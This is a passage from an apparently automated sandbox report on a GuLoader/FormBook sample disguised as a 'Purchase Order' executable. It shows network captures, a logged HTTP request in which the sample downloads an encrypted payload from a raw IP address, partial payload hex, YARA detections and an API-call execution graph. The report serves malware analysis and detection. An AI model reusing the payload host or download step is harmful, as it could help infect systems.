                                          Nov 18, 2024 18:19:36.411432028 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.411482096 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.415617943 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.415669918 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.415682077 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.415740013 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.415775061 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.456722021 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.456805944 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.456857920 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.456895113 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.456928015 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.456949949 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.457077980 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.457108021 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.457145929 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.457180977 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.457185984 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.457277060 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.715174913 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715204954 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715210915 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715322971 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715333939 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715344906 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715354919 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715420008 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.715456963 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.715475082 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715476036 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715481043 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715498924 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715513945 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715523958 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715526104 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.715533018 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715543032 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715543985 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.715553999 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715563059 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715575933 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715590000 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.715622902 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.715682030 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716233015 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716444969 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716445923 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716453075 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716461897 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716474056 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716485023 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716494083 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716496944 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716515064 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716515064 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716526985 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716531038 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716542006 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716552019 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716556072 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716557980 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716563940 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716567993 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716573000 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716582060 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716592073 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716597080 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716602087 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.716618061 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.716638088 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717456102 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717490911 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717525005 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717545033 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717566013 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717572927 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717606068 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717639923 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717650890 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717680931 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717686892 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717720985 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717727900 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717761040 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717772961 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717807055 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717840910 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717852116 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717875004 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717880964 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717909098 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717920065 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717943907 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.717947960 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.717995882 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.757222891 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757324934 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757400990 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757435083 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757458925 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.757469893 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757505894 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757541895 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.757541895 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.757563114 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757570028 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.757653952 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757725000 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757729053 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.757777929 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.757802010 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757836103 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.757855892 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.757894039 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.764286995 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.764354944 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.764388084 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.764455080 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.764497042 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.804490089 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.804522038 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.804541111 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.804593086 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.804744005 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.804857969 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:20:43.098263979 CET5320080192.168.2.7185.222.57.90

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 18, 2024 18:19:07.841828108 CET5350880162.159.36.2192.168.2.7
                                          Nov 18, 2024 18:19:08.539938927 CET53506801.1.1.1192.168.2.7

                                          HTTP Request Dependency Graph

                                          • 185.222.57.90

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.753200185.222.57.90807800C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          TimestampBytes transferredDirectionData
                                          Nov 18, 2024 18:19:34.261518955 CET175OUTGET /zFSrvbrRquo53.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                          Host: 185.222.57.90
                                          Cache-Control: no-cache
                                          Nov 18, 2024 18:19:35.133896112 CET1236INHTTP/1.1 200 OK
                                          Content-Type: application/octet-stream
                                          Last-Modified: Sun, 17 Nov 2024 17:32:38 GMT
                                          Accept-Ranges: bytes
                                          ETag: "2aaa7eb21639db1:0"
                                          Server: Microsoft-IIS/10.0
                                          Date: Mon, 18 Nov 2024 17:19:34 GMT
                                          Content-Length: 290368
                                          Data Raw: 61 45 2e 53 76 ef e2 78 23 74 30 ca 69 b2 6f ce 27 99 69 64 03 42 74 3d c6 98 29 07 86 8c 60 83 95 67 6a 7f 8c 01 16 38 31 ee 02 02 2f 63 f7 d6 54 4d 16 7a d0 9b e5 8b b7 3f ff 0b d7 76 75 ac f8 b3 bc 2f 51 05 03 22 0c 24 56 eb 5c 3d 77 c0 1c 42 c0 41 45 a1 f3 c7 0d b3 a2 6f 07 1b 10 b1 a9 a3 40 c7 62 a5 b6 be 62 16 58 3b 73 72 07 85 fb 28 67 58 7f bc be da 47 20 c2 a1 64 04 87 1f 73 7c af e8 3a c6 af 4d 9f 06 83 9d 92 98 97 cf 26 3a a5 e5 07 05 cd a0 85 bd 45 b5 a4 75 16 91 22 08 0b 31 a1 9c 12 0a 02 4e 9d 6d ab 72 7f 3e ea 09 44 53 40 bd 28 9f 50 01 dc 69 23 29 3b d2 25 61 55 04 e3 08 17 7e 55 e3 39 4b 6d 90 c4 b1 51 3e ca 9e b0 4b a1 76 15 82 42 7f 83 82 8c 47 40 c7 fb a9 9a 0a 8f 7c f6 61 55 54 5c 25 8a 08 e5 8a 85 58 df 4b 7a 78 f2 00 f7 27 c7 48 7c 1b 6b 06 da 7d c8 21 73 bf f6 50 58 00 f9 2c e1 70 35 31 94 3e 9b 67 10 80 d6 7e c0 a2 31 1d 4d b0 f3 aa 72 7f 2f f3 ce db 86 b8 f5 82 d6 af a5 5d 3c 3a d4 5b bf bb 9b 32 8e 1f df b1 9e dc 1c 69 f4 aa 80 78 40 d5 95 19 cf 75 fa 38 34 ff 6a a0 bd df [TRUNCATED]
                                          Data Ascii: aE.Svx#t0io'idBt=)`gj81/cTMz?vu/Q"$V\=wBAEo@bbX;sr(gXG ds|:M&:Eu"1Nmr>DS@(Pi#);%aU~U9KmQ>KvBG@|aUT\%XKzx'H|k}!sPX,p51>g~1Mr/]<:[2ix@u84j$ <Tuwa[ND]zeh[Ds2d$XGD1PT1,:520]{x17zQh[dW7T^EUMGDqC0O^Bv;=3j<J6i,Z%]>&]y%FT)XIYw 2\7M(N[}-W)$]}D.p?3@5=<-PuR0}WuIAn6@~<.YU8g6~F]!lI4He1OW;~w6d1>3MA]c"b_=*pC(\l1yT<.C!.L<`+fYH>Scn@?bL2\N4kT+[xbswytI50Oexy]2}!z?d*|xiqE%d6KnDpao>][fU2'^rNU*e<N&Kcl|l7wNV
                                          Nov 18, 2024 18:19:35.133910894 CET1236INData Raw: 7f 36 e7 9c dc fa 5e 28 07 b5 19 5b 44 0f a1 59 19 c4 ea 4f af 10 06 90 cc 37 a5 ec c4 15 fa b9 78 23 48 ce 48 57 d5 20 c4 11 25 02 bc 6d c6 07 6a c0 78 b1 d4 84 aa 5b 27 62 e6 69 ca 87 d4 a7 f7 8e f1 e2 54 13 06 ae f2 8c bc 95 66 cf 27 2b 5a 0a
                                          Data Ascii: 6^([DYO7x#HHW %mjx['biTf'+Z[_2{[x{N3&S+*9 7lTT*Y3Mxz49|,@@#GT,Sb]D}Q/UOb|2uUVYM|2:-W}4"&.y|.gJ);PS%
                                          Nov 18, 2024 18:19:35.133924007 CET1236INData Raw: a3 06 b2 a3 5d 7a 65 17 18 68 92 05 fa 95 af 5b 44 fc e5 73 32 85 1e 64 df 83 ee 99 d0 91 24 58 f0 ff cd 1d 47 44 31 50 54 31 84 e4 2c 3a 9f 35 e9 e1 32 e2 19 92 30 0f e3 8d 99 5d 98 17 7b 78 c2 d2 c4 31 81 ae 8a 37 7a 10 05 c9 f1 e8 51 dd 68 a1
                                          Data Ascii: ]zeh[Ds2d$XGD1PT1,:520]{x17zQh[dW7T^EUMGDqC0O^Bv;=3:8J6ip^%]>&]y%FT)XIYw 2\7M(N[}-W)$]}D.p?3
                                          Nov 18, 2024 18:19:35.134015083 CET1236INData Raw: c0 38 fd aa d7 61 71 95 3f ca 9b c7 b6 3e 3e 6f 21 83 49 55 70 2d ab 03 4d 04 c2 72 ab df df fa 75 ea 38 f7 bd fb 16 17 05 f4 67 34 49 a3 b2 64 dc 4e a1 d2 1c 2a 90 35 36 5a 99 c1 4b d5 63 ab ac 21 e6 ec 3e e1 80 ba 33 43 48 e1 33 19 52 37 10 c0
                                          Data Ascii: 8aq?>>o!IUp-Mru8g4IdN*56ZKc!>3CH3R7+My%)R><WT~pGv[NzR"W?P?"W4hO$dk7_fk1GvS3Hem?*sJECazLD0O@^w
                                          Nov 18, 2024 18:19:35.134021997 CET1236INData Raw: ed dd 00 ad 3b 4a 09 ce 45 82 bc 8e 89 b0 dc fa d3 61 07 fd 6c a6 1b 51 fa 04 da 29 ee 00 81 12 27 8c 5e 62 2e 00 47 f9 d6 ea 2e 74 22 d1 b7 22 d9 e7 81 e5 92 02 bc 6d 79 f5 6a c0 78 82 22 43 ef a7 0b 68 e6 69 0d c2 2c 83 fe 8e f1 0a c5 ee f9 51
                                          Data Ascii: ;JEalQ)'^b.G.t""myjx"Chi,Qy;[*X(|1E|[gT=1YtxHig~Yo<?>RA.]'rkwTqcyZa;C;|2"Wks_.EWf4
                                          Nov 18, 2024 18:19:35.134036064 CET1236INData Raw: 44 12 02 3b e7 7d db 2d 02 05 f7 61 75 e6 b5 7c 2f e3 5a 9b 9d 7b bf 71 c9 54 92 79 b1 8c cd 7a d9 21 33 fc d3 73 87 56 61 a8 7a 7a cf 23 b4 4b 4f 15 b8 f6 c1 10 e0 d5 b1 a5 60 bc ca 84 16 44 b5 53 1c 72 66 ae 97 69 3e 8c a4 dd 12 b4 e5 51 75 c8
                                          Data Ascii: D;}-au|/Z{qTyz!3sVazz#KO`DSrfi>Qui6#[ldWw=[Z[;=Yq&&MD7db*5]Bz{T.=X3?N"5&hl'[`F%t@Aq>e;^1C
                                          Nov 18, 2024 18:19:35.134042978 CET1236INData Raw: 5b e9 bf f5 24 df 3d 77 4a f6 3f c7 70 2f 3b 9d 8e 6a 6f a2 9b f3 b2 3e c1 da 05 7c b6 aa 98 d5 aa 03 4d 8f 77 56 54 20 20 79 b1 fe 87 ce d6 fb 16 9a b3 34 a9 36 49 90 7b ef 23 0f 2a 13 39 2b 90 35 b6 23 9c 89 c8 1d 9d eb d9 22 65 2d 3c 60 79 3b
                                          Data Ascii: [$=wJ?p/;jo>|MwVT y46I{#*9+5#"e-<`y;WCH^eCwcbN:E$8uaVUkap+f^^a Sg,{V/gQc$cMe?brdme>"rgS*rZjhmWM?wY
                                          Nov 18, 2024 18:19:35.134326935 CET1236INData Raw: 2c 3d 3b 66 9e 3a ed 7a af 14 06 c2 7f a8 c4 e2 a9 14 de ab 77 bd aa 8c 9b 72 1a 11 04 34 e2 30 2e 0f a1 24 29 4f 15 0c 17 83 22 d9 5e c0 4e ef 17 d4 00 bb f3 e1 89 26 57 54 17 ad c8 d4 25 02 bc 6d ed cf e1 03 53 70 a1 87 29 98 25 e3 1d 02 a0 87
                                          Data Ascii: ,=;f:zwr40.$)O"^N&WT%mSp)%%n{z.0)hUV5HLTJwzu@P^xqr[NI@QPTh"b]}j%EJ6,$V7`g(=.!7LZ9Ok
                                          Nov 18, 2024 18:19:35.134334087 CET1236INData Raw: ec bd 9c 5d 03 ea 48 53 22 45 53 ae 52 23 0a ba 13 80 16 fc 3e 84 25 f0 aa 95 a4 ed 1d e3 68 c4 15 8a ac a1 31 11 8d 82 76 a1 0f 37 37 61 18 66 2f 1a 59 48 73 3b c5 2e 8e 05 ba 91 71 32 84 e4 ac 43 9a 7d 6a 29 ce a2 6c 93 71 8e 1a 82 cd 5d 98 6b
                                          Data Ascii: ]HS"ESR#>%h1v77af/YHs;.q2C}j)lq]kK4|IDZfh|6"Ct;wC7ti&099;[^~?QGDjNT)KFF-is](nxi^#t~
                                          Nov 18, 2024 18:19:35.134346962 CET1236INData Raw: f5 a3 05 ef ac 66 40 62 b5 c8 30 36 42 67 56 a6 b1 9c 9c 88 06 13 3c df d6 27 f0 6b 37 e8 9b c7 ca e3 b5 2a dd b8 b1 23 77 2e ee eb 76 fc b0 e7 20 18 80 a4 2e 61 dd aa 7e d0 6e dd 1c 7d ea 61 c2 4f e1 32 8b 24 a1 2d 69 22 2e 0d 36 5a 99 7e a6 a4
                                          Data Ascii: f@b06BgV<'k7*#w.v .a~n}aO2$-i".6Z~cD>bD]R~[+Bdn+& {)}-BE&cN2~jWkx&Xv~eQ,(?PfA?"}ht+b,~"5|ucuMl:c8$TQj|Jb$@{
                                          Nov 18, 2024 18:19:35.139009953 CET1236INData Raw: 5b e8 b2 00 26 d0 0e ff d2 da 63 16 f3 13 12 09 ac 77 1c 51 a3 9d 5d fc ab fa 95 c5 95 33 fc da ef cf 8a ad e7 16 08 b5 19 68 bb b4 ff 27 19 c4 2d 0a 53 fa 06 90 cc 53 04 f4 c4 15 fa 32 38 13 c1 8b b0 bc d3 ad 5f 11 25 02 bc d5 d9 75 33 f1 8f 58
                                          Data Ascii: [&cwQ]3h'-SS28_%u3X~vMJ62uA3v4YS;1izFTSFc@i<I.NZJFqzOkQ~_ *2h]S%n<Pm[G|+Z[mdvm%+{


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:5
                                          Start time:12:18:20
                                          Start date:18/11/2024
                                          Path:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
                                          Imagebase:0x400000
                                          File size:724'333 bytes
                                          MD5 hash:B9A03FB0C2C7F23A1E4CCB0D79C5053C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1914988033.0000000003FC1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:11
                                          Start time:13:57:01
                                          Start date:18/11/2024
                                          Path:C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
                                          Imagebase:0x400000
                                          File size:724'333 bytes
                                          MD5 hash:B9A03FB0C2C7F23A1E4CCB0D79C5053C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2689733923.0000000034480000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:21.5%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:20.8%
                                            Total number of Nodes:1528
                                            Total number of Limit Nodes:43
                                            execution_graph 4958 73cf2c4f 4959 73cf2c67 4958->4959 4960 73cf158f 2 API calls 4959->4960 4961 73cf2c82 4960->4961 3863 401941 3864 401943 3863->3864 3869 402c41 3864->3869 3870 402c4d 3869->3870 3914 4062dc 3870->3914 3873 401948 3875 4059cc 3873->3875 3956 405c97 3875->3956 3878 4059f4 DeleteFileW 3880 401951 3878->3880 3879 405a0b 3881 405b36 3879->3881 3970 4062ba lstrcpynW 3879->3970 3881->3880 3999 4065fd FindFirstFileW 3881->3999 3883 405a31 3884 405a44 3883->3884 3885 405a37 lstrcatW 3883->3885 3971 405bdb lstrlenW 3884->3971 3886 405a4a 3885->3886 3889 405a5a lstrcatW 3886->3889 3891 405a65 lstrlenW FindFirstFileW 3886->3891 3889->3891 3894 405b2b 3891->3894 3896 405a87 3891->3896 3892 405b54 4002 405b8f lstrlenW CharPrevW 3892->4002 3894->3881 3897 405b0e FindNextFileW 3896->3897 3907 4059cc 60 API calls 3896->3907 3909 405322 24 API calls 3896->3909 3975 4062ba lstrcpynW 3896->3975 3976 405984 3896->3976 3984 405322 3896->3984 3995 406080 MoveFileExW 3896->3995 3897->3896 3901 405b24 FindClose 3897->3901 3898 405984 5 API calls 3900 405b66 3898->3900 3902 405b80 3900->3902 3903 405b6a 3900->3903 3901->3894 3905 405322 24 API calls 3902->3905 3903->3880 3906 405322 24 API calls 3903->3906 3905->3880 3908 405b77 3906->3908 3907->3896 3910 406080 36 API calls 3908->3910 3909->3897 3911 405b7e 3910->3911 3911->3880 3918 4062e9 3914->3918 3915 406534 3916 402c6e 3915->3916 3947 4062ba lstrcpynW 3915->3947 3916->3873 3931 40654e 3916->3931 3918->3915 3919 406502 lstrlenW 3918->3919 3920 4062dc 10 API calls 3918->3920 3923 406417 GetSystemDirectoryW 3918->3923 3925 40642a GetWindowsDirectoryW 3918->3925 3926 40654e 5 API calls 3918->3926 3927 4062dc 10 API calls 3918->3927 3928 4064a5 lstrcatW 3918->3928 3929 40645e SHGetSpecialFolderLocation 3918->3929 3940 406188 3918->3940 3945 406201 wsprintfW 3918->3945 3946 4062ba lstrcpynW 3918->3946 3919->3918 3920->3919 3923->3918 3925->3918 3926->3918 3927->3918 3928->3918 3929->3918 3930 406476 SHGetPathFromIDListW CoTaskMemFree 3929->3930 3930->3918 3938 40655b 3931->3938 3932 4065d1 3933 4065d6 CharPrevW 3932->3933 3935 4065f7 3932->3935 3933->3932 3934 4065c4 CharNextW 3934->3932 3934->3938 3935->3873 3937 4065b0 CharNextW 3937->3938 3938->3932 3938->3934 3938->3937 3939 4065bf CharNextW 3938->3939 3952 405bbc 3938->3952 3939->3934 3948 406127 3940->3948 3943 4061bc RegQueryValueExW RegCloseKey 3944 4061ec 3943->3944 3944->3918 3945->3918 3946->3918 3947->3916 3949 406136 3948->3949 3950 40613a 3949->3950 3951 40613f RegOpenKeyExW 3949->3951 3950->3943 3950->3944 3951->3950 3953 405bc2 3952->3953 3954 405bd8 3953->3954 3955 405bc9 CharNextW 3953->3955 3954->3938 3955->3953 4005 4062ba lstrcpynW 3956->4005 3958 405ca8 4006 405c3a CharNextW CharNextW 3958->4006 3961 4059ec 3961->3878 3961->3879 3962 40654e 5 API calls 3968 405cbe 3962->3968 3963 405cef lstrlenW 3964 405cfa 3963->3964 3963->3968 3965 405b8f 3 API calls 3964->3965 3967 405cff GetFileAttributesW 3965->3967 3966 4065fd 2 API calls 3966->3968 3967->3961 3968->3961 3968->3963 3968->3966 3969 405bdb 2 API calls 3968->3969 3969->3963 3970->3883 3972 405be9 3971->3972 3973 405bfb 3972->3973 3974 405bef CharPrevW 3972->3974 3973->3886 3974->3972 3974->3973 3975->3896 4012 405d8b GetFileAttributesW 3976->4012 3979 4059b1 3979->3896 3980 4059a7 DeleteFileW 3982 4059ad 3980->3982 3981 40599f RemoveDirectoryW 3981->3982 3982->3979 3983 4059bd SetFileAttributesW 3982->3983 3983->3979 3985 40533d 3984->3985 3994 4053df 3984->3994 3986 405359 lstrlenW 3985->3986 3987 4062dc 17 API calls 3985->3987 3988 405382 3986->3988 3989 405367 lstrlenW 3986->3989 3987->3986 3991 405395 3988->3991 3992 405388 SetWindowTextW 3988->3992 3990 405379 lstrcatW 3989->3990 3989->3994 3990->3988 3993 40539b SendMessageW SendMessageW SendMessageW 3991->3993 3991->3994 3992->3991 3993->3994 3994->3896 3996 406094 3995->3996 3998 4060a1 3995->3998 4015 405f06 3996->4015 3998->3896 4000 406613 FindClose 3999->4000 4001 405b50 3999->4001 4000->4001 4001->3880 4001->3892 4003 405b5a 4002->4003 4004 405bab lstrcatW 4002->4004 4003->3898 4004->4003 4005->3958 4007 405c57 4006->4007 4011 405c69 4006->4011 4009 405c64 CharNextW 4007->4009 4007->4011 4008 405c8d 4008->3961 4008->3962 4009->4008 4010 405bbc CharNextW 4010->4011 4011->4008 4011->4010 4013 405990 4012->4013 4014 405d9d SetFileAttributesW 4012->4014 4013->3979 4013->3980 4013->3981 4014->4013 4016 405f36 4015->4016 4017 405f5c GetShortPathNameW 4015->4017 4042 405db0 GetFileAttributesW CreateFileW 4016->4042 4019 405f71 4017->4019 4020 40607b 4017->4020 4019->4020 4022 405f79 wsprintfA 4019->4022 4020->3998 4021 405f40 CloseHandle GetShortPathNameW 4021->4020 4023 405f54 4021->4023 4024 4062dc 17 API calls 4022->4024 4023->4017 4023->4020 4025 405fa1 4024->4025 4043 405db0 GetFileAttributesW CreateFileW 4025->4043 4027 405fae 4027->4020 4028 405fbd GetFileSize GlobalAlloc 4027->4028 4029 406074 CloseHandle 4028->4029 4030 405fdf 4028->4030 4029->4020 4044 405e33 ReadFile 4030->4044 4035 406012 4037 405d15 4 API calls 4035->4037 4036 405ffe lstrcpyA 4038 406020 4036->4038 4037->4038 4039 406057 SetFilePointer 4038->4039 4051 405e62 WriteFile 4039->4051 4042->4021 4043->4027 4045 405e51 4044->4045 4045->4029 4046 405d15 lstrlenA 4045->4046 4047 405d56 lstrlenA 4046->4047 4048 405d2f lstrcmpiA 4047->4048 4050 405d5e 4047->4050 4049 405d4d CharNextA 4048->4049 4048->4050 4049->4047 4050->4035 4050->4036 4052 405e80 GlobalFree 4051->4052 4052->4029 4053 4015c1 4054 402c41 17 API calls 4053->4054 4055 4015c8 4054->4055 4056 405c3a 4 API calls 4055->4056 4068 4015d1 4056->4068 4057 401631 4059 401663 4057->4059 4060 401636 4057->4060 4058 405bbc CharNextW 4058->4068 4063 401423 24 API calls 4059->4063 4080 401423 4060->4080 4069 40165b 4063->4069 4067 40164a SetCurrentDirectoryW 4067->4069 4068->4057 4068->4058 4070 401617 GetFileAttributesW 4068->4070 4072 40588b 4068->4072 4075 4057f1 CreateDirectoryW 4068->4075 4084 40586e CreateDirectoryW 4068->4084 4070->4068 